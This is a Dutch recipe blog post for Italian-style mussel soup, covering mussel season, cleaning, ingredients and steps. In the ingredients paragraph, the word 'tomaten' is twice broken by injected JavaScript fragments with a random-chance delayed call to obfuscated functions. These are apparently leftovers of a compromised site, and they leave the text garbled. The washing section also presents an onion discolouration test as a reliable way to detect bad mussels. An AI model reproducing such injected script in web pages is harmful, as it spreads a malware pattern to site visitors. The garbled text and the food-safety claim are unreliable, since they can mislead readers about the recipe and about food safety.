Mosselsoep op z’n Italiaans

Afgelopen zomervakantie op Sardinië in Italië hebben we meerdere malen deze Italiaanse mosselsoep op. We vinden deze allebei zo lekker, dat we onze eigen variant hebben gemaakt. 

Wanneer is het nu precies mosselseizoen?

Altijd als ik een recept zie met mosselen vraag ik mezelf af hoe het nu ook al weer zat met het mosselseizoen. Volgens mij zijn ze het hele jaar te krijgen, ook al heb ik ook wel gehoord dat het alleen mosselseizoen is als de ‘r’ in het seizoen of maand zit. Er zijn meerdere theorieën hierover.

De start van het mosselseizoen wordt bepaald door groei en de conditie van de mossel. Het mosselseizoen verloopt van juni t/m april. Dit is dus praktisch het hele jaar. Al wordt in Nederland vaak het mosselseizoen aan gehouden als de ‘r’ in de maand zit.

Mosselsoep, wat heb je nodig?

Je hoeft je niet per se aan alle ingrediënten en de hoeveelheid te houden. Je kunt het volledig naar eigen smaak aanpassen. Je kunt als je wilt zelfs de gezeefde dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaten vervangen door een potje pastasaus, als er maar iets met dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaten bij zit.

Mosselen wassen

Voordat je begint is het heel belangrijk dat je de mosselen heel goed wast in koud water. Je gaat de mosselen immers in de soep gaar koken. Gooi tijdens het wassen van de mosselen alle kapotte mosselen direct weg. Was de mosselen een tweede keer en laat ze in een laagje koud water in de spoelbak staan met een witte ontvelde ui. Als de ui binnen een half uur verkleurd of donker wordt dan zit er een mossel bij die niet goed is. Blijft de ui mooi licht van kleur dan kun je ze met een gerust hart eten.

mosselsoep - Viving.nl

Soeprecepten

Ben jij ook dol op soep? Bekijk dan ook het recept voor pompoensoep met geitenkaas of broccolisoep met garnalen.

Recept

Voorbereiding: 30 min.
Bereiding: 30 mins

Ingredienten

  • 1 kg mosselen
  • 1,5 liter vis bouillon
  • halve prei
  • 1 el Italiaanse kruiden
  • 1 flinke scheut witte wijn (1 dl)
  • half bakje cherry tomaten
  • Verse peterselie
  • Verse basilicum
  • 1 ui
  • 1 venkel
  • 2 teentjes knoflook
  • Peper en Zout
  • 4 wortelen
  • 2 blikjes gezeefde tomaten

Aan de slag!

  1. Gebruik een grote pan met een goede sluitende deksel.
  2. Na het wassen van de mosselen kun je aan de slag met het snijden van alle groenten.
  3. Bak de groenten even aan in een pan met wat olie en de knoflook.
  4. Maak de visbouillon.
  5. Voeg alle groenten, de tomaat en andere kruiden toe aan de soep en breng deze langzaam aan de kook.
  6. Kook de mosselen op hoog vuur gedurende 5-7 minuten gaar.
  7. Schud de mosselen halverwege even om, met de deksel goed op de pan. Als de mosselen open zijn, zijn ze goed.

Score

  • Score 5.0

User Rating

5 (1 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Mosselsoep op z'n Italiaans"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.